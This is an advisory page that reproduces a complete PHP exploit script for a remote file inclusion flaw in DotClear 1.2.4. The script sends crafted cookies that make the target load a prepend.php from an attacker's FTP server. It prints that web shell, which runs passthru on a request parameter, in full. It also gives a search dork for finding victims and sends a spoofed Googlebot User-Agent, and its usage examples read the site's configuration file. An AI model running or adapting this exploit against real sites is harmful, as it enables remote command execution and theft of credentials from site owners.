DotClear <= 1.2.4 'blog_dc_path' (php5) arbitrary remote inclusion

Advisory Content :

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "DotClear <= 1.2.4 prepend.php/'blog_dc_path' arbitrary remote
inclusionrn";

echo "by rgod rgod (at) autistici (dot) org [email concealed]rn";

echo "site: http://retrogod.altervista.orgrnrn";

echo "dork: "propulsé par DotClear" "fil atom" "fil rss"
+commentairesrnrn";

/*

works with PHP5

register_globals=On,

allow_url_fopen=On

*/

if ($argc<5) {

echo "Usage: php ".$argv[0]." host path ftp cmd OPTIONSrn";

echo "host: target server (ip/hostname)rn";

echo "path: path to dotclearrn";

echo "ftp: a ftp location (without ending slash)rn";

echo "cmd: a shell commandrn";

echo "Options:rn";

echo " -p[port]: specify a port other than 80rn";

echo " -P[ip:port]: specify a proxyrn";

echo "Examples:rn";

echo "php ".$argv[0]." target.com /dotclear/ ftp://username:pass (at)
somehost (dot) com [email concealed] cat ./../conf/config.phprn";

echo "php ".$argv[0]." target.com /dotclear/ ftp://username:pass (at)
somehost (dot) com [email concealed]/somedir ls -la -p81rn";

echo "php ".$argv[0]." target.com / ftp://username:pass (at) somehost (dot)
com [email concealed] ls -la -P1.1.1.1:80rn";

echo "note, on remote ftp you need this code in
themes/default/prepend.php:rn";

echo "<?phprn";

echo "if
(get_magic_quotes_gpc()){$_REQUEST["cmd"]=stripslashes($_REQUEST["c
md"]);}rn";

echo "ini_set("max_execution_time",0);rn";

echo "echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);rn";

echo "passthru($_REQUEST["cmd"]);rn";

echo "echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);rn";

echo "?>rn";

die;

}

/*

software site: http://www.dotclear.net/

vulnerable code in layout/prepend.php near lines 78-104:

...

# Variable de conf

$theme_path = $blog_dc_path.'/themes/';

$theme_uri = dc_app_url.'/themes/';

$img_path = dc_img_url;

# Définition du th?me et de la langue

$__theme = dc_theme;

$__lang = dc_default_lang;

# Ajout des functions.php des plugins

$objPlugins = new plugins(dirname(__FILE__).'/../'.DC_ECRIRE.'/tools/');

foreach ($objPlugins->getFunctions() as $pfunc) {

require_once $pfunc;

}

# Définition du template

if (!is_dir($theme_path.$__theme)) {

header('Content-type: text/plain');

echo 'Le th?me '.$__theme.' n'existe pas';

exit;

}

if (file_exists($theme_path.$__theme.'/template.php')) {

$dc_template_file = $theme_path.$__theme.'/template.php';

} else {

$dc_template_file = $theme_path.'default/template.php';

}

echo $dc_template_file;

# Prepend du template s'il existe

if (file_exists(dirname($dc_template_file).'/prepend.php')) {

require dirname($dc_template_file).'/prepend.php';

}

...

$blog_dc_path var is not sanitized before to be used to include files,

on PHP5, because is_dir() and file_exists() funcs support ftp wrappers,

you can include an arbitrary prepend.php file in a themes/default/ folder

from a remote resource, poc:

http://[target]/[path_to_dotclear]/layout/prepend.php?blog_dc_path=ftp:/
/username:password (at) somesite (dot) com [email concealed]&cmd=ls%20-la

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=" .";}

else

{$result.=" ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}

}

return $exa."rn".$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "rn".$html;

}

$host=$argv[1];

$path=$argv[2];

$loc=$argv[3];

$cmd="";$port=80;$proxy="";

for ($i=4; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if (($temp<>"-p") and ($temp<>"-P"))

{$cmd.=" ".$argv[$i];}

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

}

$loc=urlencode($loc);

$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check
the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$packet="GET ".$path."layout/prepend.php HTTP/1.0rn";

$packet.="User-Agent: Googlebot/2.1rn";

$packet.="Cookie: blog_dc_path=".$loc."; cmd=".$cmd.";rn"; //through
cookies, log this

$packet.="Host: ".$host."rn";

$packet.="Connection: Closernrn";

sendpacketii($packet);

if (strstr($html,"*deli*"))

{echo "exploit succeeded...rn";

$temp=explode("*deli*",$html);

die($temp[1]);

}

else

{echo "exploit failed...rn";

//debug

echo $html;

}

?>

original url: http://retrogod.altervista.org/dotclear_124_php5_xpl.html

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

DotClear <= 1.2.4 'blog_dc_path' (php5) arbitrary remote inclusion